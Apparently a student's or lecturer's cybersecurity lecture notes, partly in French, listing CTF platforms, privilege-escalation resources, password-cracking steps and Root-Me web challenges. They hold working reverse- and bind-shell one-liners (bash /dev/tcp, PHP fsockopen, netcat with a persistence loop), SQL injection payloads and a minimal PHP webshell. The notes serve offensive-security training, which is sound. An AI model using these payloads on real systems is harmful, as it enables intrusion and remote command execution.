# Cybersecurity Lecture notes

This file list interesting link related to computer security (tools, info, tuto, interesting sites, ressources)

## Interesting links

* [RootMe](https://www.root-me.org/)
* [HackTheBox](https://www.hackthebox.eu/)
* [Podcast le comptoirsecu](https://www.comptoirsecu.fr/)
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
* [Collection of BURP payloads](https://github.com/1N3/IntruderPayloads)

## PrivESC

[Windows Privilege Escalation CheatCheet](https://gist.github.com/sckalath/8dacd032b65404ef7411#file-windows_privesc-L66)

[Linux Privilege Escalation Binary](https://gtfobins.github.io/)

[LinEnum](https://github.com/rebootuser/LinEnum)

[Unix privesc](http://pentestmonkey.net/tools/audit/unix-privesc-check)

[Linprivchecker](https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py)

[Monitor linux process](https://github.com/DominicBreuker/pspy)

## Reserve shell

[Ngrok : Exspose ports to Internet](https://dashboard.ngrok.com/get-started)

[Plink ssh tunnels on windows](https://medium.com/@incubusattax/setting-up-an-ssh-tunnel-using-plink-7d8dacfd4014)

## Steganography

[Aperi'Solve performs layer analysis on image](https://aperisolve.fr/)

## Tools

[CyberChef : Encode and decode data](https://aperisolve.fr/)

[Download KALI linux live 2020.4](https://cdimage.kali.org/kali-2020.4/kali-linux-2020.4-live-amd64.iso)

## how to crack a password

1. Identify the type of hash

* <https://hashes.com/en/tools/hash\\_identifier>

2. Use john the ripper (already installed on kali)

* <https://fr.wikipedia.org/wiki/John\\_the\\_Ripper>
* <https://myhackingworld.com/crack-passwords-with-john-the-ripper/>

3. Use a custom wordlist on john the ripper

* <https://gitlab.com/kalilinux/packages/wordlists/blob/kali/master/rockyou.txt.gz>

## Reverse/bind shell

```sh
#Reverse Shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");’
socat file:`tty`,raw,echo=0 TCP-L:port
Bind shell
nc –lvp 4444 –e /bin/bash

#Add a bit of persistence:
while true; do nc –lvp 4444 –e /bin/bash; done
```

## SQL exemples Payloads

<https://portswigger.net/web-security/sql-injection/cheat-sheet>

```sql
user"; --
user" union select 1,2,3,4,@@version; --
user" union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata; --
```

## PHP the most simple webshell

```PHP
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }

//Pour aller plus loin : https://github.com/flozz/p0wny-shell
?>
```

## Challenges

### ETAPE 1

* [HTTP - Headers](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Headers)
* [HTTP - User-agent](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-User-agent)
* [Fichiers de sauvegarde](https://www.root-me.org/fr/Challenges/Web-Serveur/Fichier-de-sauvegarde) -> Astuce : dirb/mutations\_common

### ETPAE 2

* [Path traversal](https://www.root-me.org/fr/Challenges/Web-Serveur/Directory-traversal)
* [File-upload-double-extensions](https://www.root-me.org/fr/Challenges/Web-Serveur/File-upload-double-extensions)
* [File Upload type MIME](https://www.root-me.org/fr/Challenges/Web-Serveur/File-upload-Type-MIME)
* [XSS Injection](https://xss-game.appspot.com/level1)

### ETAPE 3

* [SQL injection - Authentification](https://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-Authentification)
* [Injection (SQL blind)](https://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-en-aveugle)
* [Injection (SQL String)](https://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-String)

## String to decode

```
427261766f207475206120726575737369206c6520636816c6c656e6765

aidhaSBwZXJkdQ==

26237834373b26237834373b26237832303b26237832313b26237832303b26237837343b26237837353b26237832303b26237836313b26237832303b26237837323b26237836353b26237837353b26237837333b26237837333b26237836393b
```

## Wifi challenge

WEP - <https://ufile.io/h28b15y2>

WPA2 - <https://ufile.io/3qfmvxzn>